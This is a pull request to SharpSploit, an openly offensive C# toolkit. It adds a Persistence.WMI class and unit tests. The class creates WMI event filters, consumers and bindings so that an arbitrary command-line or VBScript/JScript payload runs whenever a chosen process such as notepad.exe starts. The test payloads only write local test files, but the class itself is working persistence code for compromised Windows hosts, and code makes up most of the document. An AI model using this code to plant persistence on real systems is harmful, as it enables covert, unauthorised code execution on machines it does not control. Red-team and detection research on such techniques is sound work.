### PR TITLE
Adds WMI Event Subscription Persistence

### DIFF
--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/WMITests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/WMITests.cs
@@ -11,11 +11,9 @@ using SharpSploit.Persistence;
 
 namespace SharpSploit.Tests.Persistence
 {
-
     [TestClass]
     public class WMITests
     {
-
         private static Process StartNotepad()
         {
             ProcessStartInfo startInfo = new ProcessStartInfo();

--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/WMITests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/WMITests.cs
@@ -1,0 +1,78 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System.IO;
+using System.Threading;
+using System.Diagnostics;
+using Microsoft.VisualStudio.TestTools.UnitTesting;
+
+using SharpSploit.Persistence;
+
+namespace SharpSploit.Tests.Persistence
+{
+
+    [TestClass]
+    public class WMITests
+    {
+
+        private static Process StartNotepad()
+        {
+            ProcessStartInfo startInfo = new ProcessStartInfo();
+            startInfo.FileName = @"C:\Windows\System32\notepad.exe";
+            startInfo.WindowStyle = ProcessWindowStyle.Hidden;
+            return Process.Start(startInfo);
+        }
+
+        [TestMethod]
+        public void TestInstallWMICommandLine()
+        {
+            string filePath = @"C:\CommandLineTest.txt";
+            string command = $@"cmd /c ""echo ""Command Line Test"" > {filePath}""";
+
+            WMI.InstallWMIPersistence("CommandLineTest", WMI.EventFilter.ProcessStart, WMI.EventConsumer.CommandLine, command, "notepad.exe");
+
+            Process notepad = StartNotepad();
+            Thread.Sleep(3000);
+
+            Assert.IsTrue(File.Exists(filePath));
+        }
+
+        [TestMethod]
+        public void TestInstallWMIVBScript()
+        {
+            string filePath = @"C:\VBScriptTest.txt";
+            string vbscript = $@"
+Set objFSO=CreateObject(""Scripting.FileSystemObject"")
+outFile = ""{filePath}""
+Set objFile = objFSO.CreateTextFile(outFile, True)
+objFile.Write ""VBScript Test""
+objFile.Close";
+
+            WMI.InstallWMIPersistence("VBScriptTest", WMI.EventFilter.ProcessStart, WMI.EventConsumer.ActiveScript, vbscript, "notepad.exe", WMI.ScriptingEngine.VBScript);
+
+            Process notepad = StartNotepad();
+            Thread.Sleep(3000);
+
+            Assert.IsTrue(File.Exists(filePath));
+        }
+
+        [TestMethod]
+        public void TestInstallWMIJScript()
+        {
+            string filePath = @"C:\\JScriptTest.txt";
+            string jscript = $@"
+var myObject, newfile;
+myObject = new ActiveXObject(""Scripting.FileSystemObject"");
+newfile = myObject.CreateTextFile(""{filePath}"", false);
+";
+
+            WMI.InstallWMIPersistence("JScriptTest", WMI.EventFilter.ProcessStart, WMI.EventConsumer.ActiveScript, jscript, "notepad.exe", WMI.ScriptingEngine.JScript);
+
+            Process notepad = StartNotepad();
+            Thread.Sleep(3000);
+
+            Assert.IsTrue(File.Exists(filePath));
+        }
+    }
+}

--- a/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
+++ b/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
@@ -63,6 +63,7 @@
     <Compile Include="Execution\ShellTests.cs" />
     <Compile Include="LateralMovement\DCOMTests.cs" />
     <Compile Include="LateralMovement\WMITests.cs" />
+    <Compile Include="Persistence\WMITests.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>
   <ItemGroup>

--- a/SharpSploit/Persistence/WMI.cs
+++ b/SharpSploit/Persistence/WMI.cs
@@ -1,0 +1,153 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.Management;
+
+namespace SharpSploit.Persistence
+{
+    /// <summary>
+    /// WMI is a class for abusing WMI Event Subscriptions to establish peristence. Requires elevation.
+    /// </summary>
+    public class WMI
+    {
+        /// <summary>
+        /// Creates a WMI Event, Consumer and Binding to execuate a payload.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
+        /// <remarks>
+        /// Credit to Andrew Luke (@sw4mp_f0x) for PowerLurk and
+        /// Dominic Chell (@domchell) for Persistence Part 3 – WMI Event Subscription.
+        /// </remarks>
+        /// <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
+        /// <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
+        /// <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
+        /// <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
+        /// <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
+        /// <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
+        public static bool InstallWMIPersistence(string EventName, EventFilter EventFilter, EventConsumer EventConsumer, string Payload, string ProcessName = "notepad.exe", ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
+        {
+            try
+            {
+                ManagementObject eventFilter = CreateEventFilter(EventName, EventFilter, ProcessName);
+                ManagementObject eventConsumer = CreateEventConsumer(EventName, EventConsumer, Payload, ScriptingEngine);
+                CreateBinding(eventFilter, eventConsumer);
+
+                return true;
+            }
+
+            catch (Exception e)
+            {
+                Console.Error.WriteLine("WMI Exception: " + e.Message);
+            }
+
+            return false;
+        }
+
+        private static ManagementObject CreateEventFilter(string EventName, EventFilter EventFilter, string ProcessName)
+        {
+            ManagementObject _EventFilter = null;
+
+            try
+            {
+                ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
+                ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
+
+                string query = string.Empty;
+
+                if (EventFilter == EventFilter.ProcessStart)
+                {
+                    query = $@"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='{ProcessName}'";
+                }
+
+                WqlEventQuery wql = new WqlEventQuery(query);
+                _EventFilter = wmiEventFilter.CreateInstance();
+                _EventFilter["Name"] = EventName;
+                _EventFilter["Query"] = wql.QueryString;
+                _EventFilter["QueryLanguage"] = wql.QueryLanguage;
+                _EventFilter["EventNameSpace"] = @"root/cimv2";
+                _EventFilter.Put();
+
+            }
+
+            catch (Exception e)
+            {
+                Console.WriteLine(e.Message);
+            }
+
+            return _EventFilter;
+
+        }
+
+        private static ManagementObject CreateEventConsumer(string ConsumerName, EventConsumer EventConsumer, string Payload, ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
+        {
+            ManagementObject _EventConsumer = null;
+
+            try
+            {
+                ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
+
+                if (EventConsumer == EventConsumer.CommandLine)
+                {
+                    _EventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
+                    _EventConsumer["Name"] = ConsumerName;
+                    _EventConsumer["RunInteractively"] = false;
+                    _EventConsumer["CommandLineTemplate"] = Payload;
+                }
+                else if (EventConsumer == EventConsumer.ActiveScript)
+                {
+                    _EventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
+                    _EventConsumer["Name"] = ConsumerName;
+
+                    if (ScriptingEngine == ScriptingEngine.JScript)
+                        _EventConsumer["ScriptingEngine"] = "JScript";
+                    else if (ScriptingEngine == ScriptingEngine.VBScript)
+                        _EventConsumer["ScriptingEngine"] = "VBScript";
+
+                    _EventConsumer["ScriptText"] = Payload;
+                }
+
+                _EventConsumer.Put();
+
+            }
+
+            catch (Exception e)
+            {
+                Console.WriteLine(e.Message);
+            }
+
+            return _EventConsumer;
+
+        }
+
+        private static void CreateBinding(ManagementObject EventFilter, ManagementObject EventConsumer)
+        {
+            ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
+            ManagementObject _Binding = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
+
+            _Binding["Filter"] = EventFilter.Path.RelativePath;
+            _Binding["Consumer"] = EventConsumer.Path.RelativePath;
+            _Binding.Put();
+        }
+
+        public enum EventFilter
+        {
+            ProcessStart
+        }
+
+        public enum EventConsumer
+        {
+            CommandLine,
+            ActiveScript
+        }
+
+        public enum ScriptingEngine
+        {
+            JScript,
+            VBScript
+        }
+
+    }
+}

--- a/SharpSploit/Persistence/WMI.cs
+++ b/SharpSploit/Persistence/WMI.cs
@@ -24,9 +24,9 @@ namespace SharpSploit.Persistence
         /// <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
         /// <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
         /// <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
+        /// <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
         /// <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
         /// <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
-        /// <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
         public static bool InstallWMIPersistence(string EventName, EventFilter EventFilter, EventConsumer EventConsumer, string Payload, string ProcessName = "notepad.exe", ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
         {
             try
@@ -34,29 +34,24 @@ namespace SharpSploit.Persistence
                 ManagementObject eventFilter = CreateEventFilter(EventName, EventFilter, ProcessName);
                 ManagementObject eventConsumer = CreateEventConsumer(EventName, EventConsumer, Payload, ScriptingEngine);
                 CreateBinding(eventFilter, eventConsumer);
-
                 return true;
             }
-
             catch (Exception e)
             {
                 Console.Error.WriteLine("WMI Exception: " + e.Message);
             }
-
             return false;
         }
 
         private static ManagementObject CreateEventFilter(string EventName, EventFilter EventFilter, string ProcessName)
         {
             ManagementObject _EventFilter = null;
-
             try
             {
                 ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
                 ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
 
                 string query = string.Empty;
-
                 if (EventFilter == EventFilter.ProcessStart)
                 {
                     query = $@"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='{ProcessName}'";
@@ -69,26 +64,20 @@ namespace SharpSploit.Persistence
                 _EventFilter["QueryLanguage"] = wql.QueryLanguage;
                 _EventFilter["EventNameSpace"] = @"root/cimv2";
                 _EventFilter.Put();
-
             }
-
             catch (Exception e)
             {
-                Console.WriteLine(e.Message);
+                Console.Error.WriteLine(e.Message);
             }
-
             return _EventFilter;
-
         }
 
         private static ManagementObject CreateEventConsumer(string ConsumerName, EventConsumer EventConsumer, string Payload, ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
         {
             ManagementObject _EventConsumer = null;
-
             try
             {
                 ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
-
                 if (EventConsumer == EventConsumer.CommandLine)
                 {
                     _EventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
@@ -108,18 +97,14 @@ namespace SharpSploit.Persistence
 
                     _EventConsumer["ScriptText"] = Payload;
                 }
-
                 _EventConsumer.Put();
-
             }
 
             catch (Exception e)
             {
-                Console.WriteLine(e.Message);
+                Console.Error.WriteLine(e.Message);
             }
-
             return _EventConsumer;
-
         }
 
         private static void CreateBinding(ManagementObject EventFilter, ManagementObject EventConsumer)
@@ -148,6 +133,5 @@ namespace SharpSploit.Persistence
             JScript,
             VBScript
         }
-
     }
 }

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1189,6 +1189,28 @@
             <param name="CLSID">Missing CLSID to abuse.</param>
             <param name="ExecutablePath">Path to the executable payload.</param>
         </member>
+        <member name="T:SharpSploit.Persistence.WMI">
+            <summary>
+            WMI is a class for abusing WMI Event Subscriptions to establish peristence. Requires elevation.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Persistence.WMI.InstallWMIPersistence(System.String,SharpSploit.Persistence.WMI.EventFilter,SharpSploit.Persistence.WMI.EventConsumer,System.String,System.String,SharpSploit.Persistence.WMI.ScriptingEngine)">
+            <summary>
+            Creates a WMI Event, Consumer and Binding to execuate a payload.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>Bool. True if execution succeeds, false otherwise.</returns>
+            <remarks>
+            Credit to Andrew Luke (@sw4mp_f0x) for PowerLurk and
+            Dominic Chell (@domchell) for Persistence Part 3 – WMI Event Subscription.
+            </remarks>
+            <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
+            <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
+            <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
+            <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
+            <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
+            <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
+        </member>
         <member name="T:SharpSploit.PrivilegeEscalation.Exchange">
             <summary>
             Exchange is a class for abusing Microsoft Exchange for privilege escalation.

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1207,9 +1207,9 @@
             <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
             <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
             <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
+            <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
             <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
             <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
-            <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
         </member>
         <member name="T:SharpSploit.PrivilegeEscalation.Exchange">
             <summary>


### PR DESCRIPTION
Created `SharpSploit.Persistence.WMI` - a class for abusing WMI Event Subscriptions to establish peristence.

It supports `CommandLine` & `ActiveScript` Event Consumers, and `VBScript` & `JScript` Scripting Engines.

I've only added one Event Filter (trigger) for `ProcessStart`, but structured the code with enums to simplify expansion in the future.

Three Unit Tests are included for testing the `CommandLine` Consumer; and the `ActiveScript` Consumer with both `VBScript` & `JScript`.
> Note:  I had to upgrade the `MSTest` NuGet packages to `1.4.0` for them to run on my machine.

![WMITests](https://user-images.githubusercontent.com/7346521/58759785-8b5f2d00-8527-11e9-82af-1c92ac27faa5.png)

Any feedback, alterations, suggestions etc are welcome.